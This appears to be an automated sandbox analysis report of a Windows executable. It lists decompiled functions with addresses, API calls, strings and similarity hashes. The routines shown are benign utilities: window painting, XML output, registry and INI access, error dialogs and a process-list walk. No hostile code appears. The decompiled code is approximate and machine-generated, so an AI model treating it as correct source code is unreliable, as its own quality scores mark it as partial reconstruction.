                                                                                                        0x00409407
                                                                                                        0x0040941d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00409423
                                                                                                        0x00409428
                                                                                                        0x00409375
                                                                                                        0x00409375
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040942e
                                                                                                        0x00000000
                                                                                                        0x00409428
                                                                                                        0x00409377
                                                                                                        0x0040936d
                                                                                                        0x004094fb
                                                                                                        0x004094ff
                                                                                                        0x004094ff
                                                                                                        0x00409337
                                                                                                        0x0040931c
                                                                                                        0x0040950f

                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                        • memset.MSVCRT ref: 0040938D
                                                                                                        • memset.MSVCRT ref: 0040939D
                                                                                                          • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                        • memset.MSVCRT ref: 00409488
                                                                                                        • wcscpy.MSVCRT ref: 004094A9
                                                                                                        • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 3300951397-0
                                                                                                        • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                        • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                        • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                        • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 44%
                                                                                                        			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                        0x00402ed7
                                                                                                        0x00402eee
                                                                                                        0x00402ef8
                                                                                                        0x00402f00
                                                                                                        0x00402f01
                                                                                                        0x00402f05
                                                                                                        0x00402f0a
                                                                                                        0x00402f1a
                                                                                                        0x00402f30

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                        • String ID:
                                                                                                        • API String ID: 19018683-0
                                                                                                        • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                        • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                        • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                        • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 50%
                                                                                                        			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                                                        0x004079a4
                                                                                                        0x004079b8
                                                                                                        0x004079bd
                                                                                                        0x004079c2
                                                                                                        0x004079c5
                                                                                                        0x004079c5
                                                                                                        0x004079db
                                                                                                        0x004079f7
                                                                                                        0x00407a06
                                                                                                        0x00407a0c
                                                                                                        0x00407a11
                                                                                                        0x00407a13
                                                                                                        0x00407a14
                                                                                                        0x00407a17
                                                                                                        0x00407a18
                                                                                                        0x00407a1d
                                                                                                        0x00407a22
                                                                                                        0x00407a25
                                                                                                        0x00407a2a
                                                                                                        0x00407a35
                                                                                                        0x00407a3a
                                                                                                        0x00407a3b
                                                                                                        0x00407a40
                                                                                                        0x00407a52

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004079DB
                                                                                                          • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                          • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                          • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                        • _snwprintf.MSVCRT ref: 00407A25
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                        • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                        • API String ID: 1775345501-2769808009
                                                                                                        • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                        • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                        • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                        • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 64%
                                                                                                        			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                                                        0x00404683
                                                                                                        0x00404692
                                                                                                        0x00404699
                                                                                                        0x0040469b
                                                                                                        0x004046af
                                                                                                        0x004046ba
                                                                                                        0x004046bc
                                                                                                        0x004046c7
                                                                                                        0x004046cc
                                                                                                        0x004046cd
                                                                                                        0x004046ee
                                                                                                        0x004046f3
                                                                                                        0x004046fa
                                                                                                        0x004046fa
                                                                                                        0x004046ee
                                                                                                        0x00404705

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004046AF
                                                                                                        • _snwprintf.MSVCRT ref: 004046CD
                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpen_snwprintfmemset
                                                                                                        • String ID: %s\shell\%s
                                                                                                        • API String ID: 1458959524-3196117466
                                                                                                        • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                        • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                        • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                        • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 16%
                                                                                                        			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                                                        0x00409d5f
                                                                                                        0x00409d67
                                                                                                        0x00409d70
                                                                                                        0x00409ddb
                                                                                                        0x00409d72
                                                                                                        0x00409d74
                                                                                                        0x00409db2
                                                                                                        0x00409d84
                                                                                                        0x00409d84
                                                                                                        0x00409d8c
                                                                                                        0x00409d8d
                                                                                                        0x00409d98
                                                                                                        0x00409d9d
                                                                                                        0x00409d9e
                                                                                                        0x00409da6
                                                                                                        0x00409daf
                                                                                                        0x00409daf
                                                                                                        0x00409dc3
                                                                                                        0x00409dc3

                                                                                                        APIs
                                                                                                        • wcschr.MSVCRT ref: 00409D79
                                                                                                        • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                        • String ID: "%s"
                                                                                                        • API String ID: 1343145685-3297466227
                                                                                                        • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                        • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                        • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                        • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 38%
                                                                                                        			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                                        0x004047d2
                                                                                                        0x004047da
                                                                                                        0x004047e0
                                                                                                        0x004047e4
                                                                                                        0x004047ec
                                                                                                        0x004047ec
                                                                                                        0x004047f5
                                                                                                        0x00404800
                                                                                                        0x00404801
                                                                                                        0x00404802
                                                                                                        0x0040480d
                                                                                                        0x00404812
                                                                                                        0x00404813
                                                                                                        0x00404834

                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                        • _snwprintf.MSVCRT ref: 00404813
                                                                                                        • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastMessage_snwprintf
                                                                                                        • String ID: Error$Error %d: %s
                                                                                                        • API String ID: 313946961-1552265934
                                                                                                        • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                        • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                        • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                        • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                                                        0x004068ec
                                                                                                        0x004068f0
                                                                                                        0x004068f4
                                                                                                        0x004068ff
                                                                                                        0x00406902
                                                                                                        0x0040690a
                                                                                                        0x00406910
                                                                                                        0x00406911
                                                                                                        0x0040691b
                                                                                                        0x0040691e
                                                                                                        0x00406923
                                                                                                        0x0040692d
                                                                                                        0x0040692e
                                                                                                        0x00406933
                                                                                                        0x0040693d
                                                                                                        0x00406940
                                                                                                        0x00406949
                                                                                                        0x0040694a
                                                                                                        0x00406950
                                                                                                        0x00406956
                                                                                                        0x00406959
                                                                                                        0x0040695c
                                                                                                        0x00406964
                                                                                                        0x0040696d
                                                                                                        0x00406974
                                                                                                        0x0040697e
                                                                                                        0x00406989
                                                                                                        0x00406990
                                                                                                        0x00406998
                                                                                                        0x0040699b
                                                                                                        0x0040699f
                                                                                                        0x004069b8
                                                                                                        0x004069bc
                                                                                                        0x004069c4
                                                                                                        0x004069c7
                                                                                                        0x004069c7
                                                                                                        0x004069cb
                                                                                                        0x004069ce
                                                                                                        0x004069d4
                                                                                                        0x004069d4
                                                                                                        0x004069d9
                                                                                                        0x004069df
                                                                                                        0x004069e6
                                                                                                        0x004069ea
                                                                                                        0x004069ef
                                                                                                        0x004069f2
                                                                                                        0x004069f5
                                                                                                        0x00406a00
                                                                                                        0x00406a01
                                                                                                        0x00406a06
                                                                                                        0x00406a08
                                                                                                        0x00406a0b
                                                                                                        0x00406a10
                                                                                                        0x00406a16
                                                                                                        0x00406a25
                                                                                                        0x00406a25
                                                                                                        0x00406a18
                                                                                                        0x00406a1e
                                                                                                        0x00406a1e
                                                                                                        0x00406a27
                                                                                                        0x00406a2f
                                                                                                        0x00406a32
                                                                                                        0x00406a35
                                                                                                        0x00406a3b
                                                                                                        0x00406a41
                                                                                                        0x00406a47
                                                                                                        0x00406a4d
                                                                                                        0x00406a53
                                                                                                        0x00406a5d
                                                                                                        0x00406a6d

                                                                                                        APIs
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                        • memcpy.MSVCRT ref: 0040696D
                                                                                                        • memcpy.MSVCRT ref: 0040697E
                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                          • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                          • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                          • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                          • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                          • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                          • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 975042529-0
                                                                                                        • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                        • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                        • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                        • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 83%
                                                                                                        			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                                                        0x004097b1
                                                                                                        0x004097b9
                                                                                                        0x004097bb
                                                                                                        0x004097be
                                                                                                        0x004097c3
                                                                                                        0x004097ca
                                                                                                        0x004097de
                                                                                                        0x004097de
                                                                                                        0x004097e3
                                                                                                        0x004097e5
                                                                                                        0x004097e5
                                                                                                        0x004097ec
                                                                                                        0x004097f3
                                                                                                        0x004097f6
                                                                                                        0x004097fe
                                                                                                        0x00409802
                                                                                                        0x00409805
                                                                                                        0x0040980a
                                                                                                        0x0040980d
                                                                                                        0x00409810
                                                                                                        0x00409822
                                                                                                        0x00000000
                                                                                                        0x00409827
                                                                                                        0x0040982a
                                                                                                        0x004098da
                                                                                                        0x004098da
                                                                                                        0x004098dc
                                                                                                        0x004098e0
                                                                                                        0x004098e9
                                                                                                        0x004098ec
                                                                                                        0x004098f6
                                                                                                        0x004098f6
                                                                                                        0x004098e2
                                                                                                        0x00000000
                                                                                                        0x004098e2
                                                                                                        0x00409830
                                                                                                        0x00409833
                                                                                                        0x00409838
                                                                                                        0x0040983b
                                                                                                        0x0040983e
                                                                                                        0x0040985f
                                                                                                        0x0040985f
                                                                                                        0x00409861
                                                                                                        0x00409863
                                                                                                        0x0040989e
                                                                                                        0x004098b1
                                                                                                        0x004098b8
                                                                                                        0x004098c0
                                                                                                        0x004098c5
                                                                                                        0x004098d5
                                                                                                        0x00409865
                                                                                                        0x00409865
                                                                                                        0x00409865
                                                                                                        0x0040986c
                                                                                                        0x00409878
                                                                                                        0x0040987f
                                                                                                        0x0040988a
                                                                                                        0x0040988f
                                                                                                        0x0040988f
                                                                                                        0x0040986c
                                                                                                        0x00000000
                                                                                                        0x00409863
                                                                                                        0x00409840
